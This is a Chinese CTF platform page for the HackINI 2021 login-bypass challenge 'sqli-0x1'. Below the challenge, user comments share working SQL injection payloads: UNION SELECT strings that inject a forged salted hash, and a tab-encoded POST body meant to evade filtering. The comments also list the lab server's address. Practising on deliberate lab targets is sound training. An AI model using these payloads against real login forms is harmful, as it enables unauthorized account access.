sqli-0x1WEB 未解决

分数: 0 金币: 0
所属赛事: HackINI 2021
题目作者: 未知
一  血: Aman
一血奖励: 0金币
解  决: 2221
提  示: shellmates{********}
描  述:

SQL injections are still a problem yes, even in 2021.
Bypass the login mechanism and get access to the admin area.

评论
出题人我会一直让你等着 6天前

admin' UNION SELECT 1, 'admin', '21232f297a57a5a743894a0e4a801fc3'# 为什么这个会被检测出来

回复 0

Zpfhh 1月前

用POST请求这个payload:user=a'union%09select%092,'7d0515bb9407af379e2ab13a58ee470d1f8815f56ffffa07ee5c0136e00fea0d$ttack'--+&pass=hacka 用HackBar工具秒解

回复 1

cfggfbfxdgbb 2月前

我的wp: https://blog.csdn.net/cfggbfxdgbb/article/details/155936538?spm=1001.2014.3001.5502

回复 0

hengdonghui 2月前

格式是: shellmates{********} 不是flag{******}格式。

回复 0

白乐 2月前

如何知道它是SHA-256加密的呢,以及它是如何排列的呢

回复 0
L0GAN 2月前

/?pls_help,审计代码

回复 0

Alune 3月前

加盐密码哈希

回复 0

15031597817 5月前

这个登上以后不出flag咋办

回复 1

a543589796 5月前

这道题为什么sqlmap跑不出来啊?

回复 0

lunarbyside 9月前

user=1'union select 1,'你的密码与你的盐值拼接后的字符串计算的哈希值$你的盐值&pass=你的密码。第一列为用户名username,第二列为密码password。由于查询不到用户“1”,所以查询返回的结果被union后面的值替代,第二列password值会被替换为你的哈希值和你的盐值,你就能用自己的密码登录啦☺

回复 4

Systems 1年前

http://49.232.142.230:12520/?pls_help 源代码大家直接代码审计

回复 4

WriteUp

image
a2cai

2 金币

评分(28)

解题动态

李逍遥逛霍格沃茨 攻破了该题 10小时前
zerogoctf 攻破了该题 1天前
yyt030 攻破了该题 2天前
Icey艾希 攻破了该题 3天前
出题人我会一直让你等着 攻破了该题 6天前
Fengyu3321 攻破了该题 6天前
意料之中是戏 攻破了该题 7天前
Tim.Drake 攻破了该题 9天前
testyu 攻破了该题 9天前
Neuro 攻破了该题 10天前
jhgtx 攻破了该题 11天前
xuyp 攻破了该题 12天前
chrisslyy 攻破了该题 12天前
lhfchym 攻破了该题 14天前
暴躁鱼窝 攻破了该题 14天前
13675095331 攻破了该题 14天前
wes 攻破了该题 15天前
linxi789654 攻破了该题 17天前
71朵带刺玫瑰 攻破了该题 17天前
pigbigstrong 攻破了该题 17天前
问题反馈